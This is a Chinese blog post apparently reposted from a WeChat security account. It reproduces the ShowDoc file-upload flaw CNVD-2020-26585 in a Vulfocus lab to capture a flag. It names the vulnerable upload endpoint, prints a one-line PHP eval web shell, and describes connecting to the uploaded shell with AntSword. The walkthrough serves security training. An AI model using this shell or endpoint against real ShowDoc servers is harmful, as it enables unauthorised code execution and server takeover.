复现showdoc 文件上传 (CNVD-2020-26585)

admin 2024年7月3日14:57:18评论8 views字数 490阅读1分38秒阅读模式
Attacker安全

前言

ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。

1.搭建靶场

搭建Vulfocus 漏洞威胁分析平台,拉取漏洞镜像。

复现showdoc 文件上传 (CNVD-2020-26585)

2.抓包分析

进入web之后,利用BP进行抓包分析,寻找好久也没有文件上传点,后再某漏洞平台需要在 /index.php?s=/home/page/uploadImg  进行构造请求包。

复现showdoc 文件上传 (CNVD-2020-26585)

3.构造请求包

构造出请求包,上传咱们的一句木马,设置好连接密码。

<?php echo 'hello!!!';@eval($ POST['123']?>

复现showdoc 文件上传 (CNVD-2020-26585)

4.返回木马位置

上传成功后,返回了木马URL链接,这时候我们只需要把链接

修改一下就可以了。

复现showdoc 文件上传 (CNVD-2020-26585)

5.蚁剑链接获取Flag

使用蚁剑连接返回的链接,进入后台寻找Flag复现showdoc 文件上传 (CNVD-2020-26585)

复现showdoc 文件上传 (CNVD-2020-26585)

由于找了好长时间,都没找到Flag,直接利用cmd进行寻找tmp目录,就直接看到了那金光闪闪的Flag。

复现showdoc 文件上传 (CNVD-2020-26585)

 

原文始发于微信公众号(Attacker安全):复现showdoc 文件上传 (CNVD-2020-26585)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日14:57:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   复现showdoc 文件上传 (CNVD-2020-26585)https://cn-sec.com/archives/2841198.html

发表评论

匿名网友 填写信息